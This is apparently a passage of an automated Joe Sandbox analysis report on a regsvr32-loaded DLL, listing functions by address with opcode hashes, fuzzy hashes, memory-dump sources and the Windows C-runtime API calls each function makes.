                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                                • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800157D8 Relevance: .1, Instructions: 73COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                                                                                • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024574 Relevance: .1, Instructions: 71COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                • Instruction ID: b456e1b49498020112758906e0882963a909b4f1eceaef019be325c5d28b8920
                                                                                                                                • Opcode Fuzzy Hash: c1ebaef5654986e3774d51b7b5ee7bc532e1d9e9fdd7c85144d94fdf612fce43
                                                                                                                                • Instruction Fuzzy Hash: E0317570629781ABC78CDF28C59591ABBE1FBD9344F806A2DF8868B350D774D445CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024458 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                • Instruction ID: e1cdac85440212a901397aaa30fe146fec046d1320b50ea199ee65054a90651b
                                                                                                                                • Opcode Fuzzy Hash: 465da7405903931a99b4b25fdb97e1be200aa994c495fca1ee02f708772e1815
                                                                                                                                • Instruction Fuzzy Hash: 0F317FB56187848B9388DF28C48641ABBE1FBDD30CF504B2DF8CAA6254D778D645CB4B
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001F944 Relevance: .1, Instructions: 54COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                • Instruction ID: a8885bbbd8deb659e28c33910928e4ea9ad8e802d57f0785ac04cb05f9903a21
                                                                                                                                • Opcode Fuzzy Hash: 213fcaffb4d8b257d73b1e87ee3d57575e303918952cee2d1b890f97e83a5388
                                                                                                                                • Instruction Fuzzy Hash: 802160B0528784AFC398DF28D49981ABBF1FB89344F806A1DF98687350E374D459CB43
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800124B4 Relevance: .1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                • Instruction ID: 3e7ffcddda8d873ed620f17f9684606eb13d1dd5f0b21141b7977a2e64531d07
                                                                                                                                • Opcode Fuzzy Hash: 789a1fcad167e99ddc40482d8caf18e48711ae2075d057cfa5242344ff1b2506
                                                                                                                                • Instruction Fuzzy Hash: AF217F74529780AFC788DF29C08981EBBE1FB99748F806A1DF88697354D375D445CF42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800141C0 Relevance: .0, Instructions: 46COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                • Instruction ID: 85e8bde3e512593198615bb83ad7c533a741442781c438c8658c5734f088230b
                                                                                                                                • Opcode Fuzzy Hash: 825ba780bde58c245e7a1d3728ec0527652b1ee71a04877d42e2af350f08e315
                                                                                                                                • Instruction Fuzzy Hash: AA2148B4508384CBD349DF29D05951BBBE0BB8D75CF900B1DF4CAAB264D7789644CB0A
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9DF20 Relevance: .0, Instructions: 7COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                • Instruction ID: eb4eeff74ed6a28dce01163b60c3caa59df3a9419c4884eb31ad9c6c3703feed
                                                                                                                                • Opcode Fuzzy Hash: d7cc4962d52e3e4a2947f3a3b752558ec936755315000d7411880e05df0ff2ae
                                                                                                                                • Instruction Fuzzy Hash: 51B09B2570CB55454775470754046156592B79CBE460440349D0D53B64D93C96504740
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB998A4 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1012874770-0
                                                                                                                                • Opcode ID: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                • Instruction ID: 6abf8ca1585f86a1f805ba7079df759a3c838e6aedc6a83037ae903e0338d47e
                                                                                                                                • Opcode Fuzzy Hash: b5d5b29a13da0feaba005b5cdbb38ef60d3e58c86b165e4530729409fd253580
                                                                                                                                • Instruction Fuzzy Hash: F6417522B15583C1EE66EB39D4913BD63E4AF84B54F086131DB4D4B1FBCE15D845C352
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9D0B8 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D0F5
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D111
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D139
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D142
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D158
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D161
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D177
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D180
                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D19E
                                                                                                                                • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1A7
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1D9
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D1E8
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D240
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D260
                                                                                                                                • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFFEFB970D4,?,?,?,?,?,00007FFFEFB97194), ref: 00007FFFEFB9D279
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                • API String ID: 3085332118-232180764
                                                                                                                                • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                • Instruction ID: 73be254e53e43f813fd17cc8408bc2ef7f4e80cae17e4282b456f22ec2bddc6e
                                                                                                                                • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                                                                                • Instruction Fuzzy Hash: 4351F460E1EB4381FD66EB52A94037573E06F49BA0F544135DC9E077F5EE3CE44A8202
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFBA028C Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 348COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CompareStringW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA02F9
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA030D
                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FFFEFBA07CE), ref: 00007FFFEFBA0410
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CompareErrorInfoLastString
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3723911898-1052752507
                                                                                                                                • Opcode ID: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                • Instruction ID: f79f8720057836d9e9763ebe4fe2c4ed7685b26b49848c2d80873e2a0f453ba6
                                                                                                                                • Opcode Fuzzy Hash: 1736e87f58a818c08770fb04f896c77e61df6c5aeab6e96dba7049e62cf85715
                                                                                                                                • Instruction Fuzzy Hash: 3DE18C22E08A838BEB309F1594543BD3AD2FB887E4F548535DA5E47BE4CE3CA944C702
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB976A0 Relevance: 19.7, APIs: 13, Instructions: 182COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3466867069-0
                                                                                                                                • Opcode ID: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                • Instruction ID: a84a9259032125fc660d9e3f6a40b667aea1e7a113c5c6f06195aaf986cd7648
                                                                                                                                • Opcode Fuzzy Hash: 789b8b4bb0ab73352cc37038b561749136146399fcf5725f1f3e9913cb8e60dd
                                                                                                                                • Instruction Fuzzy Hash: 26718C61F0DA4391FA699719D89537933D2EF42BB0FB84536C95E06AF1EE2CE841C243
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9A250 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$ErrorInfoLast
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 189849726-1052752507
                                                                                                                                • Opcode ID: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                • Instruction ID: 87c237077a625b691eb3a1039054009ab15a1aec2eb1bede7eaa8d8333b4074b
                                                                                                                                • Opcode Fuzzy Hash: 5e1deda3965494b22b6a4b1c1a8d863e304f3e95d2d689d04d0c4e6b189d07b4
                                                                                                                                • Instruction Fuzzy Hash: 05B1AB32B0869286DB20CB29A4503AD77E8FB49B64F94413AEB9C877F5DF39D541CB01
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB92E18 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1575098132-0
                                                                                                                                • Opcode ID: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                • Instruction ID: 34f6cc1ff8d530e89010ea8d1eeff2a1a8d24e90a3682d3d68d0592fbd1dc6d0
                                                                                                                                • Opcode Fuzzy Hash: d886c0d7000bdee151ce2691e9d9b5ad3208a0c45e3f1c810682f6e78acd55a8
                                                                                                                                • Instruction Fuzzy Hash: 13310E25F1A94385FE69EB6590A137973D5AF80BA4F081539EA0E076FACF1CE8418353
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB9E23C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E292
                                                                                                                                • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E2B1
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E356
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3B5
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3F0
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E42C
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E46C
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9E47A
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB9E49C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$Infofree
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 1638741495-1052752507
                                                                                                                                • Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                • Instruction ID: 27eb4293fad97f40f2b309a194c789f1411ea50a8ba4d3183b267afffe95659d
                                                                                                                                • Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
                                                                                                                                • Instruction Fuzzy Hash: B561C332A0868386E7249B25D8403BD76D5FB84BB8F548A35DA1D87BF4DF3CD5418212
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00007FFFEFB98F34 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 173COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB98F94
                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB98FA6
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB99006
                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB990BC
                                                                                                                                • GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB990D3
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB990E4
                                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FFFEFB99206), ref: 00007FFFEFB99161
                                                                                                                                • free.LIBCMT ref: 00007FFFEFB99171
                                                                                                                                  • Part of subcall function 00007FFFEFB9E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E292
                                                                                                                                  • Part of subcall function 00007FFFEFB9E23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E2B1
                                                                                                                                  • Part of subcall function 00007FFFEFB9E23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3B5
                                                                                                                                  • Part of subcall function 00007FFFEFB9E23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FFFEFB9E3F0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.243882256.00007FFFEFB51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFEFB50000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.243873952.00007FFFEFB50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243927498.00007FFFEFBA2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243933800.00007FFFEFBA6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.243939312.00007FFFEFBA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_7fffefb50000_regsvr32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                                • String ID: Qr2_:g
                                                                                                                                • API String ID: 3535580693-1052752507
                                                                                                                                • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                • Instruction ID: 98a2b8ab90c57cb4302e80ac3934ed73b093d5f4d003abfc921dde78d2d8fe34
                                                                                                                                • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
